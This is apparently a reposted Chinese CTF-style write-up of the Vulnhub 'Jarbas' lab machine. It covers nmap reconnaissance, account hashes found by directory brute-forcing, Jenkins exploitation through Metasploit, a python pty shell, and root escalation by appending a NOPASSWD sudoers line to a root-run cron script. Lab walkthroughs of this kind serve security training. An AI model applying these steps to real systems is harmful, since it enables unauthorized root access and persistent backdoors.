标签:http 提权 -- etc 192.168 jarbas Vulnhub tcp crontab
目录
目标:拿到服务器的Shell
信息收集
kali's ip:192.168.241.131
nmap -sP 192.168.241.131/24
一个个扫描
发现192.168.241.2是Vmware的服务,猜测jarbas的IP地址为192.168.241.142
扫描开放的端口
nmap -sV 192.168.241.142
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
其中,22/ssh端口有被爆破的风险,可以使用hydra或者是msf的爆破模块
(2)弱口令登录mysql,上传构造的恶意UDF自定义函数代码,通过调用注册的恶意函数执行系统命令
(3)SQL注入获取数据库敏感信息, load_file()函数读取系统文件,导出恶意代码到指定路径
进行目录爆破
- tiago:5978a63b4654c73c60fa24f836386d87
- trindade:f463f63616cb3f1e81ce46b39f882fd5
- eder:9b38e2b1e8b12f426b0d208a7ab6cb98
用这些账号用ssh登录,发现登陆失败,数据库也不能直接链接被拦截,推测不是用于登录主机和数据库
用刚才的账号密码登录,发现只有eder:vipsu可以登陆上
尝试攻击
首先尝试找到Jenkins的漏洞,搜索msf是否存在响应的漏洞
set forceexploit true
也可以使用第9条,在输入的参数值中需要管理员的账号密码,就可以用刚才找到的账户密码进行攻击
使用python,创建一个比较好使用的shell(bash)
python -c 'import pty ;pty.spawn("/bin/bash");'
提权
提权--信息收集
cat /etc/crontab crontab -l
cat /etc/crontab查看定时任务发现一个以root身份定时执行的任务CleaningScript.sh
提权
修改CleaningScript.sh内容,使它能够修改sudoers,给予jenkins免密码执行sudo的权限。并利用crontab定时执行该任务
echo "echo 'jenkins ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh
sudo /bin/bash
标签:http,提权,--,etc,192.168,jarbas,Vulnhub,tcp,crontab 来源: https://blog.csdn.net/weixin_45841815/article/details/117420876
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。